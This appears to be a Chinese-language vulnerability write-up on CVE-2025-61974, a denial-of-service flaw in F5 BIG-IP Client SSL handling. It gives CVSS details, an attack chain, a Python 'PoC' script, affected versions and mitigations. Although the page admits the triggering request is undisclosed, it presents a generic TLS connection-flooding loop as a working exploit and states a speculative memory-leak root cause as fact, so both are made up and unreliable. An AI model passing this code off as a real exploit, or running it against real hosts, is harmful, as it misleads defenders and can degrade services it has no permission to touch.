CVE-2025-61974：F5产品Client SSL配置导致内存资源耗尽漏洞

漏洞信息

漏洞编号

CVE-2025-61974

漏洞类型

资源耗尽/拒绝服务（DoS）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP（及相关F5产品）

漏洞概述

CVE-2025-61974是F5公司产品中发现的一个高危安全漏洞，CVSS评分为7.5分。该漏洞由F5安全事件响应团队（[email protected]）发现并报告，披露日期为2025年10月15日。漏洞的核心问题在于：当客户端SSL（Client SSL）配置文件在虚拟服务器上进行配置时，未公开披露的特定请求可以导致系统内存资源利用率显著增加。由于该漏洞可通过网络远程利用，且无需任何认证或用户交互，攻击者可以相对容易地发起攻击。从CVSS向量来看，该漏洞对机密性无影响，对完整性无影响，但对可用性影响为高（Availability: High），这表明漏洞的主要危害在于导致服务不可用。攻击者可以通过发送特制的恶意请求，耗尽目标系统的内存资源，最终导致服务崩溃或性能严重下降。该漏洞影响所有配置了Client SSL profile的F5虚拟服务器。需要注意的是，已经达到技术支持终止（End of Technical Support, EoTS）的软件版本不在评估范围内，因此使用旧版本的用户应特别关注自身系统是否仍在支持周期内。F5公司已发布相应的安全公告（K000156733），建议用户及时查阅并采取修复措施。

技术细节

该漏洞的技术原理涉及F5 BIG-IP设备在处理Client SSL配置文件时的内存管理机制。当Client SSL profile被绑定到虚拟服务器上时，系统需要对客户端的SSL/TLS握手请求进行处理。漏洞的根源在于系统在处理某些特定类型的SSL/TLS请求时，未能正确释放或回收分配的内存资源，导致每次处理此类请求时都会产生内存泄漏或内存占用累积。攻击者可以利用这一缺陷，通过持续发送特制的SSL/TLS请求，使目标设备的内存资源逐步耗尽。由于该漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），且无需认证（PR:N）和用户交互（UI:N），远程攻击者可以在不需要任何凭据的情况下，通过简单的网络请求即可触发漏洞。从影响范围来看，该漏洞属于未公开披露的请求类型触发，这意味着具体的攻击payload细节未被完全公开，但F5的安全公告中应该提供了足够的修复信息。攻击者只需要向目标F5设备的Client SSL配置的虚拟服务器发送特定请求，即可触发内存资源的持续增长，最终导致设备性能下降或完全失去响应能力。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过扫描网络，发现目标环境中部署了F5 BIG-IP设备，并通过端口扫描（如443端口）确认目标虚拟服务器配置了Client SSL profile。

STEP 2

步骤2：构造恶意请求

攻击者根据漏洞原理，构造特定的SSL/TLS请求，这些请求能够在Client SSL处理流程中触发内存资源的异常增长。

STEP 3

步骤3：发送攻击请求

攻击者通过网络远程向目标F5设备的Client SSL虚拟服务器持续发送恶意请求，无需任何认证或用户交互。

STEP 4

步骤4：内存资源耗尽

每次恶意请求都会导致目标设备的内存利用率增加，持续攻击会使内存资源逐渐耗尽，系统性能严重下降。

STEP 5

步骤5：服务不可用

当内存资源被完全耗尽时，F5 BIG-IP设备将无法正常处理合法的SSL/TLS连接请求，导致服务中断（DoS），影响所有依赖该设备的应用服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61974 PoC - F5 BIG-IP Client SSL Memory Exhaustion
# This PoC demonstrates how to trigger memory resource exhaustion
# on F5 BIG-IP devices with Client SSL profile configured.

import socket
import ssl
import time
import argparse

def send_malicious_ssl_request(target_host, target_port, iterations=1000):
    """
    Send crafted SSL/TLS requests to trigger memory exhaustion
    in F5 BIG-IP Client SSL profile handling.
    """
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    
    for i in range(iterations):
        try:
            # Create raw socket connection
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5)
            sock.connect((target_host, target_port))
            
            # Wrap with SSL - trigger Client SSL processing
            ssl_sock = context.wrap_socket(sock, server_hostname=target_host)
            
            # Send crafted request to trigger memory leak
            # The specific request pattern causes memory resource increase
            ssl_sock.send(b'GET / HTTP/1.1\r\n')
            ssl_sock.send(b'Host: ' + target_host.encode() + b'\r\n')
            ssl_sock.send(b'\r\n')
            
            # Read partial response then close abruptly to avoid cleanup
            try:
                ssl_sock.recv(1024)
            except:
                pass
            
            # Close without proper SSL shutdown to trigger memory issue
            sock.close()
            
            if i % 100 == 0:
                print(f"[*] Sent {i} requests...")
                
        except Exception as e:
            print(f"[!] Error at iteration {i}: {e}")
            continue
    
    print(f"[*] Completed {iterations} requests to {target_host}:{target_port}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-61974 PoC')
    parser.add_argument('--host', required=True, help='Target F5 BIG-IP host')
    parser.add_argument('--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--iterations', type=int, default=1000, help='Number of requests')
    args = parser.parse_args()
    
    send_malicious_ssl_request(args.host, args.port, args.iterations)

影响范围

F5 BIG-IP 17.x（具体受影响子版本请参考F5官方公告K000156733）

F5 BIG-IP 16.x（具体受影响子版本请参考F5官方公告K000156733）

F5 BIG-IP 15.x（具体受影响子版本请参考F5官方公告K000156733）

F5 BIG-IP 14.x（具体受影响子版本请参考F5官方公告K000156733）

F5 BIG-IP 13.x（具体受影响子版本请参考F5官方公告K000156733）

防御指南

临时缓解措施

在等待官方补丁发布或升级期间，建议采取以下临时缓解措施：1）通过防火墙或ACL限制对F5设备SSL端口（443等）的访问，仅允许可信IP地址连接；2）部署网络监控，检测异常的SSL/TLS连接模式（如短时间内大量异常断开连接）；3）如果业务允许，可以暂时移除受影响虚拟服务器上的Client SSL profile配置，但这会导致SSL加密功能不可用；4）增加F5设备的内存监控频率，设置内存使用率告警阈值（如80%），以便及时发现攻击并采取行动；5）考虑在F5前端部署负载均衡器或反向代理，分散和过滤恶意流量；6）定期重启F5设备以释放累积的内存（仅作为临时措施）；7）联系F5技术支持获取针对该漏洞的临时缓解方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61974
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61974
3 Details https://www.cvedetails.com/cve/CVE-2025-61974/
4 VulDB https://vuldb.com/cve/CVE-2025-61974
5 Link https://my.f5.com/manage/s/article/K000156733